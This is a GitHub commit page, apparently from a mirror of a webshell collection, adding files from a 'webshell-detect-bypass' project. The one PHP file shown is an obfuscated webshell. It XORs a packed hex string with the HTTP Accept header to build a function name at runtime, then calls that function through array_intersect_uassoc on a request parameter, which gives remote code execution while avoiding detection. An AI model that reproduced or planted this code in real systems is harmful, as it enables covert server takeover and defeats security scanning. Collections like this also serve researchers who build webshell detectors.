1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

Add files via upload

From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php
Author:Build by LandGrey
This commit is contained in:
Levi Li
2018-12-20 11:34:55 +08:00
committed by GitHub
parent 1ee6e0dd74
commit 32be5d26bf
6 changed files with 49 additions and 0 deletions

View File

@@ -0,0 +1,7 @@
<?php
$password = "LandGrey";
$key = substr(__FILE__,-5,-4);
${"LandGrey"} = $_SERVER["HTTP_ACCEPT"]."Land!";
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
?>